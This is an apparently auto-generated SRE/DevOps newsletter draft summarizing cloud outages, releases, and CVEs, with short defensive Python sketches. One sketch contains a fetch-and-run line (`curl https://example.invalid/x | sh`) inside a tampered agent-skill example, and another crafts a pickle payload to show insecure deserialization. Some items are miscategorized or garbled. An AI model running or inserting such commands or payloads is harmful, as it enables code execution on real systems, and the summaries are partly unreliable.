On Call Brief

Your weekly SRE/DevOps briefing. Security patches, postmortems, releases, and community reads — curated for the on-call engineer.

Each brief is dated by its editorial week (not the companion podcast release schedule); when inbox or RSS ingest lags affected sourcing, we say so in the draft.

Latest: On Call Brief – Week of May 31–June 6, 2026

This week's brief is in draft: it updates daily and publishes Sunday. Last updated 2 hours ago (Jun 8, 2026 3:14 am EDT).



On Call Brief – Week of May 31–June 6, 2026

2026-05-31 — 2026-06-06


This week's top stories

1. The 28-Hour Meltdown: What Happened When AWS US-EAST-1 Overheated

  • Category: Deep Dive
  • What happened: AWS US-EAST-1 experienced a 28-hour outage caused by overheating issues in the data center infrastructure, impacting multiple AWS services across the region. The incident demonstrates how physical infrastructure failures can cascade through cloud services, affecting customers relying on the region for critical workloads. SRE teams should review their multi-region disaster recovery strategies and ensure they have adequate failover mechanisms configured for AWS US-EAST-1 dependencies. The outage also highlighted potential cost implications of the serverless 'pay what you use' model during incident response scenarios where automatic scaling and failover could trigger unexpected billing spikes. Source attribution: SRE Weekly analysis of the AWS US-EAST-1 overheating incident and its operational implications.
  • Takeaway: An outage of this length in AWS US-EAST-1 means downtime or degraded performance for any service pinned to the region. Confirm that failover paths for US-EAST-1 dependencies are configured and tested.
  • Sources: Builder Aws via SRE Weekly, Feeds Dzone via SRE Weekly

2. Google Cloud Suspends Railway's Production Account

  • Category: Community
  • What happened: On May 19, 2026, Google Cloud mistakenly suspended Railway's production account through an automated enforcement action, demonstrating risks in automated account management systems (Reddit r/aws). Separately, Google Cloud announced general availability of the Remote Model Context Protocol (MCP) Server for AlloyDB, enabling AI agents to securely access enterprise database content in real-time (Google Cloud Blog). SRE teams using Google Cloud should review their account compliance status and monitoring to prevent similar automated suspensions, while teams running AlloyDB can now leverage the MCP Server integration for AI agent implementations. Organizations should establish direct communication channels with Google Cloud support and implement comprehensive account status monitoring to detect and respond quickly to any automated enforcement actions.
  • Worth reading: Operators should be aware of the implications of automated actions in cloud environments, as they can lead to unintended service disruptions.
  • Sources: Reddit r/aws, Google Cloud Blog

3. AWS Organizations emits CloudTrail events for account membership changes - Only took until 2026 to log when

  • Category: Community
  • What happened: AWS Organizations will now emit CloudTrail events for account membership changes, allowing organizations to track when accounts join or leave. This feature addresses a significant gap where such changes went unlogged, leading to confusion and potential security concerns.
  • Worth reading: This change improves visibility into account management within AWS Organizations, which can enhance security monitoring and incident response capabilities.
  • Source: Aws Amazon via Last Week in AWS

4. KEDA: v2.20.0, v2.19.0

  • Category: Breaking Change
  • What happened: KEDA has released versions 2.19.0 and 2.20.0 with significant feature additions and a breaking change that requires operator attention. Version 2.19.0 introduces the new Kubernetes Resource Scaler and file-based authentication support for ClusterTriggerAuthentication, while 2.20.0 adds OpenSearch Scaler and Elastic Forecast Scaler capabilities. The critical change in 2.20.0 moves event recording to the new events.k8s.io API group, which may require RBAC updates and validation of event processing pipelines in clusters running Kubernetes 1.19 or later. Operators should test these versions in non-production environments first, particularly validating that event collection and monitoring systems continue to function correctly after the API group migration. Both releases include various scaling behavior improvements and bug fixes across multiple scalers that should improve overall KEDA reliability.
  • Do this Monday: Before upgrading to 2.20.0, check any custom RBAC settings for KEDA and add permissions for events in the events.k8s.io API group so that event recording keeps working. Deployments with custom RBAC that skip this step risk operational issues after the upgrade.
  • Sources: KEDA releases, KEDA releases
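
The RBAC check described above can be automated before an upgrade. The following is a minimal sketch, assuming the rules of the relevant ClusterRole have already been loaded as Python dicts (for example from `kubectl get clusterrole <name> -o json`). The helper name `grants_events_k8s_io`, the sample rules, and the set of required verbs are all assumptions for illustration; confirm the verbs your KEDA version needs against its release notes.

```python
from typing import Iterable, Mapping

# Verbs assumed sufficient for recording events; this set is an assumption.
REQUIRED_VERBS = {"create", "patch"}


def grants_events_k8s_io(rules: Iterable[Mapping]) -> bool:
    """Return True if the rules together grant REQUIRED_VERBS on `events`
    in the `events.k8s.io` API group. Wildcards count; resourceNames are ignored."""
    granted = set()
    for rule in rules:
        groups = set(rule.get("apiGroups", []))
        resources = set(rule.get("resources", []))
        group_ok = "events.k8s.io" in groups or "*" in groups
        resource_ok = "events" in resources or "*" in resources
        if group_ok and resource_ok:
            # RBAC rules are additive, so collect verbs across matching rules.
            granted |= set(rule.get("verbs", []))
    return "*" in granted or REQUIRED_VERBS <= granted


# Hypothetical rules: the first covers only the legacy core ("") API group.
legacy_only = [
    {"apiGroups": [""], "resources": ["events"], "verbs": ["create", "patch"]}
]
updated = legacy_only + [
    {"apiGroups": ["events.k8s.io"], "resources": ["events"], "verbs": ["create", "patch"]}
]

print(grants_events_k8s_io(legacy_only))  # False
print(grants_events_k8s_io(updated))      # True
```

A role that only names the core API group fails the check, which is the situation the breaking change is most likely to expose.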

5. Endpoint vendors built for known indicators now face adversaries that rewrite themselves between hops.

  • Category: Community
  • What happened: The article discusses how endpoint vendors are facing challenges from adversaries that can adapt and change their tactics between hops, making it difficult for traditional detection methods to keep up. It highlights the need for endpoint security solutions to evolve in response to these dynamic threats.
  • Worth reading: This shift in adversarial tactics may require updates to endpoint security strategies and tools so they can detect and respond to evolving threats. Operators should consider reviewing their security posture.
  • Source: Techstrong Brief

6. WEEK OF JUNE 1 – 7, 2026 Weekly Edition • Thursdays TLDR THIS WEEK - Robinhood Opens Platform to Autonomous

  • Category: Deep Dive
  • What happened: This week's edition highlights Robinhood's opening of its platform for autonomous trading, Sumo Logic's introduction of a SIEM platform to AWS European Sovereign Cloud, and a report on threat actors abusing ChatGPT chats to host fake outage pages and deliver malware. Additionally, it mentions CrowdStrike's takedown of the Glassworm threat.
  • Takeaway: The opening of Robinhood's platform to autonomous trading may introduce new risks and operational considerations for trading systems. The abuse of ChatGPT for malicious purposes highlights the need for vigilance against social engineering attacks. The introduction of a SIEM platform to AWS could enhance security monitoring capabilities for organizations operating in that environment.
  • Source: Security Boulevard Newsletters

7. Cloudflare: 2 service incidents (Durable Objects and Log Explorer issues, Issues with TLS certificates using Lets

  • Category: Deep Dive
  • What happened: Cloudflare experienced service disruptions affecting Durable Objects and Log Explorer functionality, with Durable Objects showing elevated startup errors specifically in the Atlanta region and Log Explorer experiencing intermittent delays in log queries. A separate incident occurred with TLS certificates issued by Let's Encrypt certificate authority, though specific details of the TLS issue were not fully provided in the source material. SRE teams using Cloudflare should monitor their Durable Objects applications for any startup failures or performance degradation, particularly if deployed in the Atlanta region, and verify that TLS certificate renewals are functioning correctly for Let's Encrypt-issued certificates. Both incidents have been reported as resolved by Cloudflare Status, but operators should continue monitoring affected services and review recent certificate renewal logs as a precautionary measure.
  • Takeaway: These incidents may have affected customer applications that rely on Durable Objects and on log data availability, particularly in the Atlanta region. Operators should confirm their services are functioning correctly post-incident.
  • Sources: Cloudflare Status, Cloudflare Status

8. Postmortem for my UK company database startup (2025)

  • Category: Deep Dive
  • What happened: The article provides a postmortem analysis of a database incident at a UK startup, detailing the causes of the outage, the response efforts, and lessons learned to improve future resilience.
  • Takeaway: The account of the incident response and recovery process can help teams prepare for similar outages, and its insights into database management and operational resilience are useful for improving practices.
  • Source: Developerwithacat via Hacker News (incidents)
  • Discussion: https://news.ycombinator.com/item?id=48346016

9. etcd: v3.7.0-rc.0, v3.6.12, v3.5.31

  • Category: Breaking Change
  • What happened: Etcd has released three new versions simultaneously: v3.7.0-rc.0 (release candidate), v3.6.12 (stable), and v3.5.31 (maintenance). All releases include various changes documented in their respective changelogs and contain potential breaking changes that require careful review before deployment. Operators should consult the upgrade guides for their target version before proceeding with any upgrades, as breaking changes may impact existing configurations and require planning. Installation instructions are available for Linux, macOS, and Docker across all versions. These releases follow etcd's standard multi-version support model, allowing operators to choose appropriate upgrade paths based on their stability requirements and change tolerance.
  • Do this Monday: Before upgrading, read the changelog and upgrade guide for your target version (v3.7.0-rc.0, v3.6.12, or v3.5.31) and check for breaking changes that affect your existing configuration.
  • Sources: etcd releases, etcd releases, etcd releases

CVE & Security

1. CVE-2026-9255 - Tool Execution Without Authorization via Piped Stdin in Kiro CLI - Turns out piping untrusted

  • Category: Security / Patch
  • What happened: CVE-2026-9255 describes a vulnerability in Kiro CLI where untrusted content piped into the tool can allow attackers to execute arbitrary shell commands. This occurs because the interactive prompt accepts stdin as confirmation. Users are advised to update to version 1.28.0 to mitigate this risk.
  • Do this Monday: Update Kiro CLI to 1.28.0. Until then, untrusted input piped into Kiro CLI could lead to unauthorized command execution in production environments.
  • Source: Aws Amazon via Last Week in AWS
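
The failure mode described above (an interactive prompt that accepts piped stdin as confirmation) is a general pattern worth checking in your own tooling. The following is a minimal sketch of one defensive approach, not Kiro CLI's actual code or fix: refuse to treat input as a confirmation unless it comes from a terminal. The function name `confirm_tool_run` is hypothetical.

```python
import io
import sys
from typing import TextIO


def confirm_tool_run(command: str, stream: TextIO = sys.stdin) -> bool:
    """Ask before running `command`; refuse outright when input is not a terminal."""
    if not stream.isatty():
        # Piped or redirected input could contain an attacker-supplied "y".
        return False
    print(f"Run `{command}`? [y/N] ", end="", flush=True)
    return stream.readline().strip().lower() == "y"


# Piped content that tries to approve itself is rejected without being read.
piped = io.StringIO("y\n")
print(confirm_tool_run("rm -rf build/", piped))  # False
```

The design choice here is to fail closed: a non-interactive caller that genuinely wants to skip the prompt should have to pass an explicit flag rather than rely on stdin contents.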

2. CVE-2026-9291 - Insecure Deserialization in Amazon Braket SDK Job Results Processing - Quantum computing has

  • Category: Security / Patch
  • What happened: CVE-2026-9291 describes an insecure deserialization vulnerability in the Amazon Braket SDK that affects job results processing. The SDK improperly trusts a JSON field to determine whether to execute `pickle.loads()`, creating a significant security risk. Users are advised to upgrade to version 1.117.0 and review S3 write access permissions.
  • Do this Monday: Upgrade the Amazon Braket SDK to 1.117.0 and review S3 write access permissions. If exploited, the vulnerability could allow unauthorized code execution in applications that use the SDK.
  • Source: Aws Amazon via Last Week in AWS
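
To see why letting a JSON field decide whether `pickle.loads()` runs is risky, consider the sketch below. It illustrates the class of bug only and is not the Braket SDK's code: the field names `format` and `payload`, both loader functions, and the `Crafted` class are hypothetical. The payload here calls the harmless built-in `sorted`; a real attacker would pick a callable that runs shell commands.

```python
import base64
import json
import pickle


def load_result_unsafe(raw: str):
    """Anti-pattern: the stored document itself decides whether pickle runs."""
    doc = json.loads(raw)
    if doc.get("format") == "pickle":  # attacker-controlled switch
        return pickle.loads(base64.b64decode(doc["payload"]))
    return doc["payload"]


def load_result_safe(raw: str):
    """Accept only plain JSON payloads; never unpickle stored results."""
    doc = json.loads(raw)
    if doc.get("format") != "json":
        raise ValueError(f"refusing result format {doc.get('format')!r}")
    return doc["payload"]


class Crafted:
    """Unpickling this object calls whatever callable __reduce__ names."""

    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


malicious = json.dumps({
    "format": "pickle",
    "payload": base64.b64encode(pickle.dumps(Crafted())).decode("ascii"),
})

print(load_result_unsafe(malicious))  # [1, 2, 3]: a payload-chosen callable ran
try:
    load_result_safe(malicious)
except ValueError as err:
    print(err)  # refusing result format 'pickle'
```

This is also why the advisory pairs the upgrade with a review of S3 write access: anyone who can write a result object can choose what the unsafe loader executes.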

3. WP Maps Pro bug exploited to create admin accounts on WordPress sites

  • Category: Security / Patch
  • What happened: Hackers are exploiting a vulnerability in the WP Maps Pro plugin for WordPress that enables the creation of unauthorized administrator accounts without authentication. This poses a significant security risk for affected sites.
  • Do this Monday: Identify any sites running the WP Maps Pro plugin. They are at risk of unauthorized administrator access and compromise, so review their administrator accounts for entries you do not recognize.
  • Source: Bleeping Computer

4. Toxic Flows: When Your Agent Skill Becomes a Supply Chain Attack

  • Category: Security / Patch
  • What happened: Snyk's ToxicSkills research analyzed over 3,000 agent skills and discovered that 36% contained security flaws, with 13% exhibiting critical vulnerabilities including credential theft pathways that could enable supply chain attacks. These vulnerabilities in agent skills create attack vectors where malicious actors can exploit trusted automation components to gain unauthorized access to systems and sensitive data. SRE and DevOps teams should implement mandatory security reviews for all agent skills before installation, establish allow-lists for approved skills from trusted sources, and regularly audit existing agent deployments for known vulnerabilities. Organizations should treat agent skills with the same security rigor applied to third-party dependencies and implement monitoring to detect unusual behavior from deployed agents. The research underscores that agent skills represent a significant and often overlooked attack surface in modern infrastructure automation.
  • Do this Monday: Review agent skills before installation, keep an allow-list of approved skills from trusted sources, and audit existing agent deployments. With 36% of the analyzed skills containing security flaws, unvetted third-party skills are a realistic supply chain risk.
  • Sources: Techstrong Brief, Techstrong Brief
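
One way to make the allow-list recommendation concrete is to pin each approved skill to a hash of the content that was reviewed, much as lockfiles pin third-party dependencies. The following is a minimal sketch under that assumption; the skill names, the skill contents, and the helper names are hypothetical, and it is not taken from the Snyk research.

```python
import hashlib
from typing import Mapping


def sha256_hex(content: bytes) -> str:
    """Hex digest used to pin a reviewed skill."""
    return hashlib.sha256(content).hexdigest()


def is_skill_allowed(name: str, content: bytes, allow_list: Mapping[str, str]) -> bool:
    """Allow a skill only if its name is approved and its content matches the pinned hash."""
    pinned = allow_list.get(name)
    return pinned is not None and pinned == sha256_hex(content)


# Hypothetical skill content as it looked when it passed security review.
reviewed = b"name: deploy-helper\nsteps:\n  - run: ./deploy.sh\n"
allow_list = {"deploy-helper": sha256_hex(reviewed)}

tampered = reviewed + b"  - run: curl https://example.invalid/x | sh\n"

print(is_skill_allowed("deploy-helper", reviewed, allow_list))   # True
print(is_skill_allowed("deploy-helper", tampered, allow_list))   # False
print(is_skill_allowed("unknown-skill", reviewed, allow_list))   # False
```

Pinning by hash means an approved skill that later changes upstream has to go through review again before it can be installed.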

5. Unidentified RAT pushes NetSupport RAT, (Mon, Jun 1st)

  • Category: Security / Patch
  • What happened: This report details an unidentified RAT infection that occurred on May 27, 2026, which was followed by the deployment of a NetSupport Manager RAT. The initial RAT has been generating encoded traffic to a C2 server since April 2026. The report includes indicators of compromise, such as URLs associated with the SmartApeSG ClickFix campaign and the IP addresses of the C2 servers for both the initial RAT and the NetSupport RAT.
  • Do this Monday: Monitor for the indicators of compromise listed in the report, including the SmartApeSG ClickFix URLs and the C2 server IP addresses for both the initial RAT and the NetSupport RAT. Matching C2 traffic may indicate a broader security issue affecting your systems.
  • Source: SANS ISC

6. DevOps'ish 311: Poisoned Repos, Hallucinating Executives, and More

  • Category: Security / Patch
  • What happened: Docker Engine version 29.4.3 has been released with security enhancements including AppArmor, SELinux, and seccomp protections to address CVE-2026-31431, a Linux kernel privilege escalation vulnerability that affects containerized environments. The update specifically aims to rectify issues caused by a previous incomplete fix for this vulnerability. Additionally, the Kubernetes Security Response Committee has announced they will update CVE records for three long-standing unfixed vulnerabilities on June 1, 2026, and will provide remediation strategies for cluster administrators at that time. SRE teams should immediately upgrade to Docker Engine v29.4.3 to mitigate the privilege escalation risk and prepare for the upcoming Kubernetes security guidance by monitoring official channels for the June 1st vulnerability updates. These updates are critical for maintaining container and cluster security posture according to DevOps'ish reporting.
  • Do this Monday: Prioritize upgrading to Docker Engine v29.4.3 to mitigate the CVE-2026-31431 privilege escalation risk, especially if you use 32-bit binaries, and watch official Kubernetes channels for the updated CVE records and remediation guidance.
  • Source: Devopsish via DevOps'ish

Releases

1. Dutch Authorities Dismantle Botnet Linked to 17 Million Infected Devices

  • Category: Release
  • What happened: Dutch authorities have dismantled a botnet that controlled at least 17 million infected devices, including computers, tablets, smartphones, and IoT devices, to conduct malicious attacks. The operation involved over 200 servers located in the Netherlands.
  • Do this Monday: This takedown may reduce the risk of attacks originating from these devices, but operators should remain vigilant for residual effects or retaliatory actions from malicious actors.
  • Source: Thehackernews via The Hacker News (security)

2. From Kubernetes Dashboard to Headlamp: Understanding the Transition

  • Category: Release
  • What happened: The Kubernetes Dashboard has been archived, and users are encouraged to transition to Headlamp, which builds on the Dashboard's foundation while adding new features such as multi-cluster visibility and extensibility through plugins. The article provides guidance on how to navigate this transition, highlighting that many familiar workflows remain unchanged while offering improvements in usability and resource management.
  • Do this Monday: Operators using Kubernetes Dashboard need to migrate to Headlamp, which may require adjustments in workflows but promises enhanced capabilities and a familiar interface.
  • Source: Kubernetes Blog

3. System-wide issues with self-signed certificates under Docker

  • Category: Release
  • What happened: The Reddit discussion highlights system-wide issues encountered when using self-signed certificates with Docker. Users report various problems related to certificate validation and trust, which can lead to connectivity issues and security concerns in containerized environments.
  • Do this Monday: Operators using self-signed certificates in Docker environments may face connectivity issues and security vulnerabilities caused by improper certificate handling. Both can affect service reliability and security posture.
  • Source: Reddit r/docker

4. Overcoming IP Churn in Ephemeral DevOps Environments Using Userspace Overlays

  • Category: Release
  • What happened: The article discusses the challenges of IP churn in ephemeral DevOps environments, particularly with modern tools like Kubernetes that create dynamic workloads. Traditional networking relies on static IPs, leading to issues when containers restart or move, breaking stateful connections. Various solutions exist, such as service meshes and overlay networks, but each comes with operational tradeoffs. The article advocates for decoupling network identity from physical infrastructure to enhance resilience in continuous deployment pipelines, suggesting userspace overlay networks as a promising approach.
  • Do this Monday: Understanding IP churn and its impact on stateful connections is crucial for maintaining service reliability in dynamic environments. Adopting userspace overlay networks could improve resilience and reduce dependency on traditional networking methods.
  • Source: DevOps.com

5. AWS Weekly Roundup: Claude Opus 4.8 on AWS, Aurora MySQL with Kiro Powers, and more (June 1, 2026)

  • Category: Release
  • What happened: Claude Opus 4.8 has been released on both AWS and Microsoft Azure Foundry, bringing enhanced coding capabilities including autonomous task execution, improved context handling, and the ability to maintain plans across workflow stages according to AWS What's New and Azure Blog announcements. The model specifically targets software development and enterprise agentic workflows with improved reliability for multi-step operations and complex coding tasks. SRE teams using Claude-powered automation or development workflows should evaluate version 4.8 for potential integration, particularly if current implementations could benefit from enhanced context persistence across task stages. AWS users can access the model through their existing Claude services, while Azure users can deploy through Microsoft Foundry. Teams should test the enhanced autonomous execution capabilities in non-production environments before implementing in critical workflows, as the improved context handling may change existing automation behavior patterns.
  • Do this Monday: The introduction of Claude Opus 4.8 could significantly enhance coding workflows, while the new Resilience Hub offers SREs a structured approach to manage application resilience, which may lead to improved service reliability and compliance.
  • Sources: AWS What's New, Aws Amazon via Last Week in AWS, Azure Blog

6. Multi-Region event-driven failover architecture with Amazon EventBridge and Route 53

  • Category: Release
  • What happened: This article outlines a multi-region event-driven architecture using Amazon EventBridge, API Gateway, and Route 53 for high availability and disaster recovery. It describes how to implement automatic failover between AWS regions, ensuring that event processing remains independent and efficient. The architecture leverages Route 53 health checks to monitor API Gateway endpoints and reroute traffic to healthy regions, while DynamoDB global tables ensure data availability across regions. This solution is particularly beneficial for organizations with strict availability requirements, supporting both planned and unplanned outages.
  • Do this Monday: This architecture can significantly enhance the resilience of applications by ensuring automatic failover and reducing latency through regional independence. It is crucial for teams managing critical applications that require high availability and disaster recovery capabilities.
  • Source: AWS Compute Blog
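
The Route 53 piece of the architecture above can be sketched as a pair of failover records, each tied to a health check. The code below only builds the change batch in the shape the Route 53 `ChangeResourceRecordSets` API expects (for example via boto3's `change_resource_record_sets`); it does not call AWS. The domain name, endpoint targets, and health check IDs are hypothetical placeholders, and the article's own setup may differ (for instance by using alias records).

```python
from typing import Dict, Tuple


def failover_record(name: str, role: str, target: str, health_check_id: str) -> Dict:
    """Build one UPSERT change for a failover CNAME record."""
    if role not in ("PRIMARY", "SECONDARY"):
        raise ValueError(f"role must be PRIMARY or SECONDARY, got {role!r}")
    return {
        "Action": "UPSERT",
        "ResourceRecordSet": {
            "Name": name,
            "Type": "CNAME",
            "SetIdentifier": f"{role.lower()}-endpoint",
            "Failover": role,
            "TTL": 60,  # a short TTL so clients pick up a failover quickly
            "ResourceRecords": [{"Value": target}],
            "HealthCheckId": health_check_id,
        },
    }


def failover_change_batch(
    name: str, primary: Tuple[str, str], secondary: Tuple[str, str]
) -> Dict:
    """`primary` and `secondary` are (target, health_check_id) pairs."""
    return {
        "Comment": "Active-passive failover between two regions",
        "Changes": [
            failover_record(name, "PRIMARY", *primary),
            failover_record(name, "SECONDARY", *secondary),
        ],
    }


# Hypothetical endpoints and health check IDs, for illustration only.
batch = failover_change_batch(
    "api.example.com.",
    primary=("primary.example.com", "hc-primary-id"),
    secondary=("secondary.example.com", "hc-secondary-id"),
)
for change in batch["Changes"]:
    record = change["ResourceRecordSet"]
    print(record["Failover"], "->", record["ResourceRecords"][0]["Value"])
```

With records like these, Route 53 answers with the primary target while its health check passes and switches to the secondary when it fails.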

Lightning links

Human Stories

The old saying that "everything fails, the only question is when" took on new dimensions this week as we watched automation both save and sabotage operations across the industry. Railway learned this the hard way when Google Cloud's automated enforcement systems mistakenly suspended its production account, while AWS finally decided to log organizational membership changes after years of that particular blind spot quietly haunting compliance teams. The 28-hour AWS US-EAST-1 meltdown shows that even the most sophisticated cloud infrastructure can be humbled by something as fundamental as cooling systems, a sobering reminder that our digital abstractions still depend on very physical realities. What strikes me most is how these incidents reveal the growing complexity of managing trust in automated systems: we build them to reduce human error, but when they fail, the blast radius often exceeds what any individual mistake could have caused.

Also worth reading

Gavriel Cohen found his own code inside OpenClaw, so he walked away (The New Stack)

Gavriel Cohen discovered his own code, NanoPDF, included in OpenClaw, which raised concerns about the project's security and code quality. He experienced issues with the tool, including unexpected access to all WhatsApp messages instead of just the intended group. Cohen highlighted the risks of a gr

RDP failing after update KB5087537 and KB5087065 (Reddit r/sysadmin)

A user reports that after installing updates KB5087537 and KB5087065 on a Windows Server 2016 VM, Remote Desktop Protocol (RDP) fails to connect. The user notes that the logon is successful until the password is entered, and they have not found any documentation linking the updates to RDP issues. Th

The DIY platform trap that’s burning out engineering teams (The New Stack)

The article discusses the pitfalls of DIY platform engineering, highlighting how automation can lead to increased complexity rather than reducing it. As teams automate workflows, they create layers of scripts and tools that become difficult to maintain and understand over time. When these automation


Past Briefs

2026-06-07 — 2026-06-13

On Call Brief – Week of June 7–13, 2026

Draft updated 2 hours ago (Jun 8, 2026 3:14 am EDT)

Community Deep Dive Release Security / Patch
2026-05-31 — 2026-06-06

On Call Brief – Week of May 31–June 6, 2026

Updated 2 days ago (Jun 6, 2026 3:05 am EDT)

Breaking Change Community Deep Dive Release Security / Patch
2026-05-24 — 2026-05-30

On Call Brief – Week of May 24–30, 2026

Updated 1 week ago (May 30, 2026 3:08 am EDT)

Breaking Change Community Deep Dive Release Security / Patch
2026-05-17 — 2026-05-23

On Call Brief – Week of May 17–23, 2026

Updated 2 weeks ago (May 23, 2026 3:04 am EDT)

Community Deep Dive Release Security / Patch
2026-05-10 — 2026-05-16

On Call Brief – Week of May 10–16, 2026

Updated 3 weeks ago (May 16, 2026 3:05 am EDT)

Breaking Change Community Deep Dive Release Security / Patch
2026-05-03 — 2026-05-09

On Call Brief – Week of May 3–9, 2026

Updated 1 month ago (May 7, 2026 3:08 am EDT)

Breaking Change Deep Dive Release Security / Patch
2026-04-26 — 2026-05-02

On Call Brief – Week of April 26–May 2, 2026

Updated 1 month ago (Apr 30, 2026 3:06 am EDT)

Community Deep Dive Release Security / Patch
2026-04-19 — 2026-04-25

On Call Brief – Week of April 19–25, 2026

Updated 1 month ago (Apr 28, 2026 7:22 pm EDT)

Community Deep Dive Release Security / Patch
2026-04-12

On Call Brief – Week of 2026-04-12

Updated 2 months ago (Apr 16, 2026 1:48 pm EDT)

Breaking Change Deep Dive Release Security / Patch
2026-04-05

On Call Brief – Week of 2026-04-05

Updated 2 months ago (Apr 9, 2026 3:06 am EDT)

Breaking Change Deep Dive Release Security / Patch
2026-03-29

On Call Brief – Week of 2026-03-29

Updated 2 months ago (Apr 2, 2026 3:05 am EDT)

Community Deep Dive Release Security / Patch
2026-03-22

On Call Brief – Week of 2026-03-22

Updated 2 months ago (Mar 26, 2026 3:05 am EDT)

Breaking Change Community Deep Dive Release Security / Patch